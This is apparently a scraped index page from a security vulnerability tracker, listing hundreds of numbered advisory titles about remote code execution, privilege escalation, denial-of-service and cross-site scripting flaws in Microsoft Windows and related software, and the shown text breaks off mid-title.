Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002394] Microsoft Windows NT Remote Procedure Call (RPC) Services Can Be Crashed With Malformed Packets [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events [1028910] Windows TCP/IP Stack ICMPv6 Memory Allocation Flaw Lets Remote Users Deny Service [1028909] Windows NAT Driver ICMP Processing Flaw Lets Remote Users Deny Service [1028908] Microsoft Active Directory Federation Services Discloses Account Information to Remote Users [1028907] Windows Kernel Lets Local Users Gain Elevated Privileges and Bypass ALSR [1028906] Windows RPC Bug Lets Local Users Gain Elevated Privileges [1028905] (Microsoft Issues Fix for Exchange Server) Oracle Fusion Middleware Bugs Let Remote Users Deny Service and Access and Modify Data [1028904] (Microsoft Issues Fix for Exchange Server) Oracle PeopleSoft Products Bugs Let Remote Users Partially Access and Modify Data and Partially Deny Service [1028902] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028874] Windows Phone PEAP-MS-CHAPv2 Authentication Protocol Weakness May Let Remote Users Obtain Authentication Information [1028759] (Microsoft Issues Fix for Internet Explorer) Adobe Flash Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1028756] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028755] Microsoft Silverlight Null Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028753] Windows Media Format Runtime Parsing Flaw in WMV Video Decoder Lets Remote Users Execute Arbitrary Code [1028752] Microsoft DirectShow GIF Image Processing Flaw Lets Remote Users Execute Arbitrary Code [1028751] Microsoft Office TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028750] Microsoft Visual Studio .NET TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028749] Microsoft Lync TrueType Font Parsing Flaw Lets Remote Users Execute Arbitrary Code [1028746] Windows Kernel-Mode Drivers Bugs Let Local Users Gain Elevated Privileges and Remote Users Execute Arbitrary Code [1028745] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1028657] Windows Kernel Lets Local Users Obtain Information From Kernel Memory [1028656] Windows Print Spooler Memory Error Lets Local Users Gain Elevated Privileges [1028655] Windows TCP/IP Driver Bug Lets Remote Users Deny Service [1028651] Microsoft Internet Explorer Multiple Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1028650] Microsoft Office Buffer Overflow in PNG Image Processing Lets Remote Users Execute Arbitrary Code [1028591] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1028561] Windows Essentials URI Handling Flaw Discloses Potentially Sensitive Information to Remote Users [1028560] Microsoft Visio Discloses Information to Remote Users [1028558] Microsoft .NET Flaws Let Remote Users Bypass Authentication and Bypass XML File Signature Verification [1028557] Microsoft Malware Protection Engine Flaw Lets Remote Users Execute Arbitrary Code [1028554] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1028553] Microsoft Word RTF Shape Data Parsing Error Lets Remote Users Execute Arbitrary Code [1028552] Microsoft Publisher Multiple Bugs Let Remote Users Execute Arbitrary Code [1028551] Microsoft Lync Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028550] Microsoft Office Communicator Object Access Flaw Lets Remote Users Execute Arbitrary Code [1028546] Windows HTTP Stack Header Processing Flaw Lets Remote Users Deny Service [1028545] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028514] Microsoft Internet Explorer Object Access Bug Lets Remote Users Execute Arbitrary Code [1028412] Microsoft SharePoint Server Discloses Files to Remote Authenticated Users [1028411] Microsoft Office Web Apps Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028410] Microsoft InfoPath Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028409] Microsoft Groove Server Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028408] Microsoft SharePoint Input Validation Flaw in HTML Sanitization Component Permits Cross-Site Scripting Attacks [1028407] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028405] Microsoft Active Directory LDAP Processing Flaw Lets Remote Users Deny Service [1028404] Microsoft Antimalware Client Path Name Flaw Lets Local Users Gain Elevated Privileges [1028403] Windows Kernel Race Conditions Let Local Users Gain Elevated Privileges [1028402] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges and Deny Service [1028398] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1028397] Windows Remote Desktop Bug in ActiveX Control Lets Remote Users Execute Arbitrary Code [1028394] NVIDIA Windows Driver Bugs Lets Local Users Gain Elevated Privileges [1028341] Windows Modern Mail Lets Remote Users Spoof URLs in Email Messages [1028281] Microsoft Office for Mac HTML Loading Bug Lets Remote Users Obtain Potentially Sensitive Information [1028279] Microsoft OneNote Buffer Validation Flaw Lets Remote Users Obtain Potentially Sensitive Information [1028278] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting and Denial of Service Attacks [1028276] Microsoft Visio Viewer Tree Object Type Confusion Error Lets Remote Users Execute Arbitrary Code [1028275] Microsoft Internet Explorer Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1028274] Windows USB Driver Memory Error Lets Physically Local Users Gain Elevated Privileges [1028273] Microsoft Silverlight Memory Pointer Dereference Lets Remote Users Execute Arbitrary Code [1028129] Windows NFS Server Null Dereference Lets Remote Users Deny Service [1028128] Windows TCP/IP Stack FIN WAIT Processing Flaw Lets Remote Users Deny Service [1028127] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1028126] Windows Kernel Lets Local Users Gain Elevated Privileges [1028124] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1028123] Microsoft .NET Bug Lets Remote Users Execute Arbitrary Code and Bypass Security Restrictions [1028119] Microsoft DirectShow Media Decompression Flaw Lets Remote Users Execute Arbitrary Code [1028118] Windows OLE Automation Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1028117] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Access Information Across Domains [1028116] Microsoft Internet Explorer Vector Markup Language Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027949] Microsoft .NET Open Data (OData) Protocol Bug Lets Remote Users Deny Service [1027948] Microsoft System Center Configuration Manager Input Validation Flaws Permit Cross-Site Scripting Attacks [1027947] Windows TCP/IP Stack Lets Remote Users Downgrade SSL/TLS Sessions [1027946] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027945] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027944] Windows Print Spooler Bug Lets Remote Users Execute Arbitrary Code [1027943] Microsoft XML Core Services (MSXML) XML Parsing Flaws Let Remote Users Execute Arbitrary Code [1027930] Microsoft Internet Explorer CDwnBindInfo Object Reuse Flaw Lets Remote Users Execute Arbitrary Code [1027870] Microsoft Internet Explorer Discloses Mouse Location to Remote Users [1027860] Windows IP-HTTPS Certificate Processing Flaw Lets Remote Users Bypass Security Restrictions [1027859] Microsoft DirectPlay Heap Overflow Lets Remote Users Execute Arbitrary Code [1027857] Microsoft Exchange Server RSS Feed Bug Lets Remote Users Deny Service [1027856] Windows Kernel-Mode Drivers Font Processing Flaw Lets Remote Users Execute Arbitrary Code [1027855] Windows File Handling Component Memory Error Lets Remote Users Execute Arbitrary Code [1027852] Microsoft Word RTF Parsing Error Lets Remote Users Execute Arbitrary Code [1027851] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027753] Microsoft .NET Flaws Let Remote Users Execute Arbitrary Code, Obtain Potentially Sensitive Information, and Bypass Security Restrictions [1027752] Microsoft Excel Buffer Overflow, Memory Corruption, and Use-After-Free Errors Let Remote Users Execute Arbitrary Code [1027751] Microsoft Internet Information Server (IIS) FTP Server Lets Remote Users Obtain Files and Local Users Obtain Passwords [1027750] Windows Kernel Multiple Bugs Let Remote Users Execute Arbitrary Code and Local Users Obtain Elevated Privileges [1027749] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027748] Windows Shell Briefcase Integer Overflow and Underflow Let Remote Users Execute Arbitrary Code [1027647] EMC NetWorker Module for Microsoft Applications Lets Remote Users Execute Arbitrary Code and Local Users Obtain Passwords [1027629] Microsoft Office InfoPath HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027628] Microsoft Office Communicator HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027627] Microsoft Lync HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027626] Microsoft SharePoint HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027625] Microsoft Groove Server HTML Sanitizer Flaw Permits Cross-Site Scripting Attacks [1027623] Microsoft SQL Server Input Validation Flaw in Reporting Services Permits Cross-Site Scripting Attacks [1027622] Windows Kernel Integer Overflow Lets Local Users Gain Elevated Privileges [1027621] Microsoft Works Heap Corruption Flaw Lets Remote Users Execute Arbitrary Code [1027620] Microsoft Kerberos Null Pointer Dereference Lets Remote Users Deny Service [1027618] Microsoft Word Memory Errors Let Remote Users Execute Arbitrary Code [1027583] Adobe AIR Applications and Adobe Software for Windows Have Compromised Certificates [1027555] Microsoft Internet Explorer Multiple Use-After-Free Bugs Let Remote Users Execute Arbitrary Code [1027541] Windows Phone Certificate Validation Flaw Lets Remote Users Spoof Secure E-mail Servers [1027538] Microsoft Internet Explorer execCommand Flaw Lets Remote Users Execute Arbitrary Code [1027522] Citrix XenApp Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1027512] Microsoft System Center Configuration Manager Input Validation Flaw Permits Cross-Site Scripting Attacks [1027511] Microsoft Visual Studio Team Foundation Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1027394] Microsoft Visio Buffer Overflow in Processing DXF Format Files Lets Remote Users Execute Arbitrary Code [1027393] Microsoft Office CGM Graphics File Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027392] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1027391] Windows Kernel-Mode Drivers Bug Lets Local Users Gain Elevated Privileges [1027390] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1027379] Windows Print Spooler Remote Administration Protocol Format String and Buffer Overflows Let Remote Users Deny Service [1027378] Windows Remote Desktop RDP Processing Flaw Lets Remote Users Execute Arbitrary Code [1027335] Citrix Access Gateway Plug-in for Windows ActiveX Control Buffer Overflows Let Remote Users Execute Arbitrary Code [1027295] Microsoft SharePoint Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027294] Microsoft Exchange Server Bugs in Oracle Outside In Libraries Let Remote Users Execute Arbitrary Code [1027234] Microsoft Office for Mac Folder Permission Flaw Lets Local Users Gain Elevated Privileges [1027233] Windows Schannel Lets Remote Users Decrypt TLS Traffic [1027232] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting, Information Disclosure, and URL Redirection Attacks [1027231] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027230] Windows Shell Command Injection Flaw Lets Remote Users Execute Arbitrary Code [1027229] Microsoft Office DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027228] Microsoft Visual Basic for Applications DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027227] Microsoft Data Access Components (MDAC) ADO Cachesize Buffer Overflow Lets Remote Users Execute Arbitrary Code [1027226] Microsoft Internet Explorer Deleted Object Access Bugs Let Remote Users Execute Arbitrary Code [1027223] Microsoft IIS Web Server Discloses Potentially Sensitive Information to Remote Users [1027157] Microsoft XML Core Services (MSXML) Object Access Error Lets Remote Users Execute Arbitrary Code [1027155] Windows Kernel Bug in User Mode Scheduler Lets Local Users Gain Elevated Privileges [1027154] Windows Kernel-Mode Driver Bugs Lets Local Users Gain Elevated Privileges [1027151] Microsoft Dynamics AX Input Validation Flaw Permits Cross-Site Scripting Attacks [1027150] Microsoft Lync DLL Loading Error Lets Remote Users Execute Arbitrary Code [1027149] Microsoft .NET Memory Access Bug Lets Remote Users Execute Arbitrary Code [1027148] Windows Remote Desktop Bug Lets Remote Users Execute Arbitrary Code [1027147] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code, Conduct Cross-Site Scripting Attacks, and Obtain Potentially Sensitive Information [1027089] PHP Windows com_print_typeinfo() Buffer Overflow Lets Local Users Gain Elevated Privileges [1027048] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code and Deny Service [1027044] Windows TCP/IP Stack Lets Remote Users Bypass the Firewall and Local Users Gain Elevated Privileges [1027042] Microsoft Visio Viewer Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1027041] Microsoft Office Excel File Memory Corruption Errors and Heap Overflows Let Remote Users Execute Arbitrary Code [1027040] Microsoft Silverlight Double Free Memory Error Lets Remote Users Execute Arbitrary Code [1027039] Windows OS Lets Remote Users Cause Arbitrary Code to Be Executed and Lets Local Users Gain Elevated Privileges [1027038] Microsoft GDI+ Bugs Let Remote Users Execute Arbitrary Code [1027036] Microsoft .NET Framework Serialization Bugs Let Remote Users Execute Arbitrary Code [1027035] Microsoft Word RTF Processing Flaw Lets Remote Users Execute Arbitrary Code [1027020] Windows Win32k.sys Memory Error Lets Remote Users Deny Service [1027003] HP Insight Management Agents for Windows Server Bugs Permit Cross-Site Scripting, Cross-Site Request Forgery, and URL Redirection Attacks [1026911] Microsoft Office WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026910] Microsoft Works WPS File Heap Overflow Lets Remote Users Execute Arbitrary Code [1026909] Microsoft Forefront Unified Access Gateway Bugs Let Remote Users Obtain Potentially Sensitive Information and Conduct Browser Redirection Attacks [1026907] Microsoft .NET Parameter Validation Flaw Lets Remote Users Execute Arbitrary Code [1026906] Windows Authenticode Signature Verification Can Be Bypassed By Remote or Local Users [1026901] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1026794] Microsoft DirectWrite Unicode Character Processing Flaw Lets Remote Users Deny Service [1026793] Windows Kernel PostMessage() Lets Local Users Gain Elevated Privileges [1026792] Microsoft Visual Studio Lets Local Users Gain Elevated Privileges [1026791] Microsoft Expression Design DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026790] Windows Remote Desktop Protocol Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1026789] Microsoft DNS Server Lets Remote Users Deny Service [1026686] Microsoft SharePoint Input Validation Flaws Permit Cross-Site Scripting Attacks [1026684] Microsoft Visio Viewer Multiple Bugs Let Remote Users Execute Arbitrary Code [1026683] Windows XP Indeo Codec DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026682] Windows Color Control Panel DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026681] Microsoft Silverlight Bugs Let Remote Users Execute Arbitrary Code [1026680] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1026679] Windows Kernel Keyboard Layout Use-After-Free Lets Local Users Gain Elevated Privileges [1026678] Windows C Runtime Library Buffer Overflow Lets Remote Users Execute Arbitrary Code [1026677] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1026499] Microsoft Anti-Cross Site Scripting Library Flaw May Permit Cross-Site Scripting Attacks [1026498] Windows Schannel Lets Remote Users Decrypt SSL/TLS Traffic [1026495] Windows Client-Server Run-time Subsystem Unicode Processing Flaw Lets Local Users Gain Elevated Privileges [1026494] Windows Object Packager Lets Remote Users Execute Arbitrary Code [1026493] Windows Kernel Lets Local Users Bypass the SafeSEH Security Feature [1026492] Windows Media Player Bugs Let Remote Users Execute Arbitrary Code [1026479] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Commands, Access User Accounts, and Redirect Users [1026469] Microsoft ASP.NET Hash Table Collision Bug Lets Remote Users Deny Service [1026450] Windows Win32k.sys GDI Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026426] RSA SecurID Software Token for Windows DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026418] Windows OLE Processing Error Lets Remote Users Cause Arbitary Code to Be Executed on the Target User's System [1026417] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1026416] Microsoft Office IME (Chinese) Lets Local Users Gain Elevated Privileges [1026415] Windows Kernel Object Initialization Error Lets Local Users Gain Elevated Privileges [1026414] Microsoft Publisher Multiple Errors Let Remote Users Execute Arbitrary Code [1026413] Microsoft Internet Explorer DLL Loading Error Lets Remote Users Execute Arbitrary Code and HTML Processing Bugs Let Remote Users Obtain Information [1026412] Microsoft Active Directory Memory Access Error Lets Remote Authenticated Users Execute Arbitrary Code [1026411] Microsoft PowerPoint DLL Loading and OfficeArt Object Processing Flaws Let Remote Users Execute Arbitrary Code [1026410] Microsoft Office Excel File Memory Error Lets Remote Users Execute Arbitrary Code [1026409] Microsoft Office Use-After-Free Bug Lets Remote Users Execute Arbitrary Code [1026408] Microsoft Internet Explorer Error in Microsoft Time Component Lets Remote Users Execute Arbitrary Code [1026407] Windows Media Center DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026406] Windows Media Player DVR Parsing Error Lets Remote Users Execute Arbitrary Code [1026347] Windows Win32k.sys Keyboard Layout Bug Lets Local Users Deny Service [1026294] Microsoft Active Directory CRL Validation Flaw Lets Remote Users Bypass Authentication [1026293] Windows Mail DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026292] Windows Meeting Space DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026291] Windows Win32k.sys Kernel-Mode Drivers Array Index Validation Flaw Lets Remote Users Deny Service [1026290] Windows TCP/IP Stack Integer Overflow Lets Remote Users Execute Arbitrary Code [1026220] Microsoft Publisher 'Pubconv.dll' Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1026169] Microsoft Forefront Unified Access Gateway Input Validation Flaws Permits Cross-Site Scripting, HTTP Response Splitting, and Denial of Service Attacks [1026168] Microsoft Host Integration Server Bugs Let Remote Users Deny Service [1026166] Windows Media Center DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026165] Windows Kernel-Mode Drivers Memory Corruption Errors Let Remote Users Execute Arbitrary Code and Local Users Deny Service and Gain Elevated Privileges [1026164] Microsoft Active Accessibility Component DLL Loading Error Lets Remote Users Execute Arbitrary Code [1026162] Microsoft .NET Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026161] Microsoft Silverlight Inheritance Restriction Error Lets Remote Users Execute Arbitrary Code [1026160] Microsoft Internet Explorer Multiple Flaws Let Remote Users Execute Arbitrary Code [1026040] Microsoft SharePoint Multiple Flaws Permit Cross-Site Scripting and Information Disclosure Attacks [1026039] Microsoft Office DLL Loading Error and Unspecified Bug Lets Remote Users Execute Arbitrary Code [1026038] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1026020] Windows 2008 R1 CSRSS Null Pointer Dereference Lets Local Users Deny Service [1026005] Windows Script Host DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025905] Microsoft .NET Socket Trust Validation Error Lets Remote Users Obtain Information and Redirect Certain Network Traffic [1025904] Windows Kernel File Metadata Parsing Error Lets Remote Users Deny Service [1025903] Microsoft Visual Studio Input Validation Hole Permits Cross-Site Scripting Attacks [1025902] Microsoft ASP.NET Chart Control Remote File Disclosure [1025901] Windows Remote Desktop Protocol (RDP) Memory Access Error Lets Remote Users Deny Service [1025900] Windows TCP/IP Stack Flaws Let Remote Users Deny Service [1025899] Windows Client-Server Run-time Subsystem 'Winsrv.dll' Lets Local Users Gain Elevated Privileges [1025898] Windows Remote Access Service NDISTAPI Driver Lets Local Users Gain Elevated Privileges [1025897] Windows Remote Desktop Web Access Validation Flaw Permits Cross-Site Scripting Attacks [1025896] Microsoft Visio Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025895] Microsoft Data Access Components Insecure Library Loading Lets Remote Users Execute Arbitrary Code [1025894] Microsoft DNS Server Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1025893] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025885] Windows Client-Server Run-time Subsystem SrvGetConsoleTitle() Flaw Lets Local Users Deny Service [1025847] Microsoft Internet Explorer Flaw in Processing EUC-JP Encoded Characters Lets Remote Users Conduct Cross-Site Scripting Attacks [1025775] Citrix Access Gateway Plug-in for Windows Lets Remote Users Execute Arbitrary Code [1025763] Microsoft Visio May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025762] Windows Client-Server Run-time Subsystem Bugs Let Local Users Gain Elevated Privileges [1025761] Windows Kernel-Mode Drivers Let Local Users Gain Elevated Privileges [1025675] Microsoft Word Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1025655] Microsoft MHTML Input Validation Hole Permits Cross-Site Scripting Attacks [1025654] Microsoft Internet Explorer Vector Markup Language (VML) Object Access Error Lets Remote Users Execute Arbitrary Code [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025649] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1025648] Microsoft SQL Server XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025647] Microsoft Visual Studio XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025646] Microsoft Office InfoPath XML Editor External Entity Resolution Flaw Lets Remote Users Obtain Potentially Sensitive Information [1025645] Windows Server Message Block Request Parsing Flaw Lets Remote Users Deny Service [1025644] Microsoft Hyper-V VMBus Packet Validation Flaw Lets Local Users Deny Service [1025642] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025641] Microsoft .NET JIT Compiler Validation Flaw Lets Remote Users Execute Arbitrary Code [1025640] Windows Server Message Block Parsing Error Lets Remote Users Execute Arbitrary Code [1025639] Microsoft Distributed File System Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1025638] Windows Kernel Memory Corruption Error in Win32k.sys Lets Remote Users Execute Arbitrary Code [1025637] Microsoft Forefront Threat Management Gateway Bounds Validation Flaw in Winsock Provider Lets Remote Users Execute Arbitrary Code [1025636] Microsoft .NET Array Offset Error Lets Remote Users Execute Code [1025635] Microsoft Silverlight Array Offset Error Lets Remote Users Execute Arbitrary Code [1025513] Microsoft PowerPoint Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025431] HP Insight Control for Windows Lets Remote Authenticated Users Gain Elevated Privileges and Remote Users Conduct Cross-Site Request Forgery Attacks [1025360] Microsoft Reader Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1025359] Microsoft MHTML Stack Overflow Lets Remote Users Execute Arbitrary Code [1025348] Windows Operating System Loader Driver Signing Restrictions Can Be Bypassed [1025347] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1025346] Microsoft Foundation Classes May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1025345] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1025344] Microsoft WordPad Parsing Error Lets Remote Users Execute Arbitrary Code [1025343] Microsoft Office DLL Loading and Graphic Object Processing Flaws Let Remote Users Execute Arbitrary Code [1025340] Microsoft PowerPoint Bugs Let Remote Users Execute Arbitrary Code [1025337] Microsoft Excel Multiple Bugs Let Remote Users Execute Arbitrary Code [1025335] Microsoft GDI+ EMF Image Integer Overflow Lets Remote Users Execute Arbitrary Code [1025334] Microsoft OpenType Compact Font Format (CFF) Driver Stack Overflow Lets Remote Users Execute Arbitrary Code [1025333] Microsoft JScript and VBScript Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1025332] Windows DNS Resolution LLMNR Processing Flaw Lets Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1025331] Microsoft .NET Stack Corruption Error in JIT Compiler Lets Remote Users Execute Arbitrary Code [1025329] Windows SMB Server Lets Remote Users Execute Arbitrary Code [1025328] Windows Server Message Block Parsing Errors Let Remote Users Execute Arbitrary Code [1025327] Microsoft Internet Explorer Bugs Let Remote Users Obtain Potentially Sensitive Information, Execute Arbitrary Code, and Hijack User Clicks [1025172] Windows Remote Desktop Client DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025171] Microsoft Groove DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025170] Microsoft DirectShow DLL Loading Error Lets Remote Users Execute Arbitrary Code [1025169] Windows Media Player and Windows Media Center Error in Parsing '.dvr-ms' Files Lets Remote Users Execute Arbitrary Code [1025164] Microsoft Internet Explorer Lets Remote Users Spoof the Address Bar [1025117] Microsoft Malware Protection Engine Registry Processing Error Lets Local Users Gain Elevated Privileges [1025086] Microsoft Active Directory Heap Overflow in Processing BROWSER ELECTION Packets May Let Remote Users Execute Arbitrary Code [1025049] Microsoft Local Security Authority Subsystem Service (LSASS) Lets Local Users Gain Elevated Privileges [1025048] Windows Kerberos Lets Local Users Gain Elevated Privileges [1025047] Windows Driver Flaws Lets Local Users Gain Elevated Privileges [1025046] Windows Kernel Lets Local Users Gain Elevated Privileges [1025045] Windows Client-Server Run-time Subsystem Lets Local Users Gain Elevated Privileges [1025044] Microsoft JScript and VBScript Disclose Information to Remote Users [1025043] Microsoft Visio Memory Corruption Error in Processing Visio Files Lets Remote Users Execute Arbitrary Code [1025042] Microsoft Active Directory SPN Collosions May Let Remote Authenticated Users Deny Service [1025038] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1025034] Windows OpenType Compact Font Format Bug Lets Remote Users Execute Arbitrary Code [1025003] Microsoft MHTML Input Validation Hole May Permit Cross-Site Scripting Attacks [1024948] Windows Backup Manager May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024947] Microsoft Data Access Components (MDAC) Memory Corruption Errors in Processing DSN Data and ADO Records Let Remote Users Execute Arbitrary Code [1024940] Microsoft Internet Explorer Use-After-Free in 'mshtml.dll' May Let Remote Users Execute Arbitrary Code [1024932] Windows Graphics Rendering Engine Stack Overflow in Processing Thumbnail Images Lets Remote Users Execute Arbitrary Code [1024925] Microsoft Fax Cover Page Editor Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024922] Microsoft Internet Explorer Recursive CSS Import Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024921] Microsoft IIS FTP Server Lets Remote Users Deny Service [1024888] Microsoft Exchange Server RPC Processing Flaw Lets Remote Authenticated Users Deny Service [1024887] Microsoft Office Graphics Filters Let Remote Users Execute Arbitrary Code [1024886] Microsoft SharePoint Input Validation Flaw in Processing SOAP Requests Let Remote Users Execute Arbitrary Code [1024885] Microsoft Publisher Bugs Let Remote Users Execute Arbitrary Code [1024884] Microsoft Hyper-V Input Validation Flaw Lets Local Guest Operating System Users Deny Service [1024883] Windows Netlogon Service Lets Remote Authenticated Users Deny Service [1024882] Windows Consent User Interface Lets Local Users Gain Elevated Privileges [1024881] Windows Routing and Remote Access NDProxy Buffer Overflow Lets Local Users Gain Elevated Privileges [1024880] Windows Kernel Buffer Overflows and Memory Corruption Errors Let Local Users Gain Elevated Privileges [1024878] Windows Address Book May 